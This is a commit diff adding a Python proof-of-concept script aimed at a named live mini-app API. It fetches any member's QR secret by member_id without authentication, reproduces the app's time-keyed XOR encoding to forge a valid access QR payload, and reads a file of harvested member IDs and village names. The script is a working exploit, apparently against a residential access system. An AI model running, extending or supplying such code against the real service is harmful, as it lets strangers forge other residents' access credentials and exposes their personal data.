This commit is contained in:
186
miniapp_qr_poc.py
Normal file
186
miniapp_qr_poc.py
Normal file
@@ -0,0 +1,186 @@
|
||||
import argparse
|
||||
import base64
|
||||
import json
|
||||
import os
|
||||
import re
|
||||
import subprocess
|
||||
import urllib.request
|
||||
from datetime import datetime
|
||||
from pathlib import Path
|
||||
from zoneinfo import ZoneInfo
|
||||
|
||||
API_URL = "https://jsh.szsentry.com/api//mine/one_see_secret_word"
|
||||
BASE_DIR = Path(__file__).resolve().parent
|
||||
HELPER_JS = BASE_DIR / "js" / "21D38FE5F73FD4DF47B5E7E2FB120D83.js"
|
||||
QR_JS = BASE_DIR / "js" / "0C723952F73FD4DF6A145155C4220D83.js"
|
||||
FOUND_IDS_FILE = BASE_DIR / "found_ids.txt"
|
||||
FOUND_ID_PATTERN = re.compile(r"ID:\s*(\d+)\s*\|\s*Village:\s*(.+)")
|
||||
DEFAULT_TIMEZONE = ZoneInfo(os.getenv("MINIAPP_QR_TIMEZONE", "Asia/Shanghai"))
|
||||
|
||||
|
||||
def fetch(member_id: int):
|
||||
body = json.dumps({"member_id": member_id}).encode()
|
||||
req = urllib.request.Request(
|
||||
API_URL,
|
||||
data=body,
|
||||
headers={"Content-Type": "application/json"},
|
||||
method="POST",
|
||||
)
|
||||
with urllib.request.urlopen(req, timeout=20) as resp:
|
||||
return json.loads(resp.read().decode("utf-8"))
|
||||
|
||||
|
||||
def get_command(qr_hex: str, dt: datetime | None = None) -> bytes:
|
||||
if dt is None:
|
||||
dt = datetime.now(DEFAULT_TIMEZONE)
|
||||
elif dt.tzinfo is None:
|
||||
dt = dt.replace(tzinfo=DEFAULT_TIMEZONE)
|
||||
else:
|
||||
dt = dt.astimezone(DEFAULT_TIMEZONE)
|
||||
c = [
|
||||
f"{dt.year % 100:02d}",
|
||||
f"{dt.month:02d}",
|
||||
f"{dt.day:02d}",
|
||||
f"{dt.hour:02d}",
|
||||
f"{dt.minute:02d}",
|
||||
f"{dt.second:02d}",
|
||||
]
|
||||
m = [int(x, 16) for x in c]
|
||||
s = m[0] ^ m[2]
|
||||
s = (((s + m[4]) ^ m[1]) + m[3]) ^ m[5]
|
||||
s &= 0xFF
|
||||
|
||||
pairs = re.findall(r"[0-9A-Fa-f]{2}", qr_hex)
|
||||
g = [f"{(int(x, 16) ^ s):02X}" for x in pairs]
|
||||
f = ("".join(c) + "".join(g)).upper()
|
||||
d = [ord(ch) for ch in f]
|
||||
h = [0x03] + d + [0x04]
|
||||
chk = 0
|
||||
for x in h:
|
||||
chk ^= x
|
||||
chk_hex = f"{chk:02X}"
|
||||
h.extend(ord(ch) for ch in chk_hex)
|
||||
h.append(0x0D)
|
||||
return bytes(h)
|
||||
|
||||
|
||||
def render_with_bundled_js(qr_hex: str) -> str:
|
||||
js = f'''
|
||||
const helper = require({json.dumps(str(HELPER_JS))});
|
||||
const qr = require({json.dumps(str(QR_JS))});
|
||||
const out = qr.QR(helper.getCommand({json.dumps(qr_hex)}).toString());
|
||||
console.log(out);
|
||||
'''
|
||||
cp = subprocess.run(["node", "-e", js], capture_output=True, text=True)
|
||||
if cp.returncode != 0:
|
||||
raise RuntimeError(f"node failed\nstdout:\n{cp.stdout}\nstderr:\n{cp.stderr}")
|
||||
return cp.stdout.strip()
|
||||
|
||||
|
||||
def save_data_url(data_url: str, out_path: str):
|
||||
m = re.match(r"data:.*?;base64,(.*)", data_url)
|
||||
if not m:
|
||||
raise ValueError("unexpected data URL")
|
||||
raw = base64.b64decode(m.group(1))
|
||||
with open(out_path, "wb") as f:
|
||||
f.write(raw)
|
||||
|
||||
|
||||
def load_found_ids(path: str | Path = FOUND_IDS_FILE) -> list[dict]:
|
||||
path = Path(path)
|
||||
items = []
|
||||
seen = set()
|
||||
if not path.exists():
|
||||
return items
|
||||
|
||||
with path.open("r", encoding="utf-8") as f:
|
||||
for line in f:
|
||||
line = line.strip()
|
||||
if not line:
|
||||
continue
|
||||
m = FOUND_ID_PATTERN.match(line)
|
||||
if not m:
|
||||
continue
|
||||
member_id = int(m.group(1))
|
||||
if member_id in seen:
|
||||
continue
|
||||
seen.add(member_id)
|
||||
village_name = m.group(2).strip()
|
||||
items.append(
|
||||
{
|
||||
"member_id": member_id,
|
||||
"village_name": village_name,
|
||||
"label": f"{member_id} | {village_name}",
|
||||
}
|
||||
)
|
||||
return items
|
||||
|
||||
|
||||
def summarize_response(resp: dict) -> dict:
|
||||
data = resp.get("data") or {}
|
||||
return {
|
||||
"status": resp.get("status"),
|
||||
"msg": resp.get("msg"),
|
||||
"member_id": data.get("member_id"),
|
||||
"village_name": data.get("village_name"),
|
||||
"uuid": data.get("uuid"),
|
||||
"qr_prefix": str(data.get("qr", ""))[:40],
|
||||
}
|
||||
|
||||
|
||||
def generate_member_qr(member_id: int, include_data_url: bool = False) -> dict:
|
||||
resp = fetch(member_id)
|
||||
data = resp.get("data") or {}
|
||||
qr_hex = data.get("qr")
|
||||
if not qr_hex:
|
||||
raise ValueError(f"member_id={member_id} did not return qr data")
|
||||
|
||||
payload = get_command(qr_hex)
|
||||
result = summarize_response(resp)
|
||||
result.update(
|
||||
{
|
||||
"qr_hex": qr_hex,
|
||||
"payload_len": len(payload),
|
||||
"payload_hex_prefix": payload.hex()[:160],
|
||||
}
|
||||
)
|
||||
if include_data_url:
|
||||
result["data_url"] = render_with_bundled_js(qr_hex)
|
||||
return result
|
||||
|
||||
|
||||
def main():
|
||||
ap = argparse.ArgumentParser()
|
||||
ap.add_argument("--member-id", type=int)
|
||||
ap.add_argument("--qr")
|
||||
ap.add_argument("--json-out")
|
||||
ap.add_argument("--gif-out")
|
||||
args = ap.parse_args()
|
||||
|
||||
resp = None
|
||||
qr_hex = args.qr
|
||||
if args.member_id is not None:
|
||||
resp = fetch(args.member_id)
|
||||
if args.json_out:
|
||||
with open(args.json_out, "w", encoding="utf-8") as f:
|
||||
json.dump(resp, f, ensure_ascii=False, indent=2)
|
||||
qr_hex = resp["data"]["qr"]
|
||||
|
||||
if not qr_hex:
|
||||
raise SystemExit("provide --member-id or --qr")
|
||||
|
||||
payload = get_command(qr_hex)
|
||||
print("payload_len=", len(payload))
|
||||
print("payload_hex_prefix=", payload.hex()[:160])
|
||||
|
||||
if args.gif_out:
|
||||
data_url = render_with_bundled_js(qr_hex)
|
||||
save_data_url(data_url, args.gif_out)
|
||||
print("saved", args.gif_out)
|
||||
|
||||
if resp:
|
||||
print(json.dumps(summarize_response(resp), ensure_ascii=False, indent=2))
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Reference in New Issue
Block a user